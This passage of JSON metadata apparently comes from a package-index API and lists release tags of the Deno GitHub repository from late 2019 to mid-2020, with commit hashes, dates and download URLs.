/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1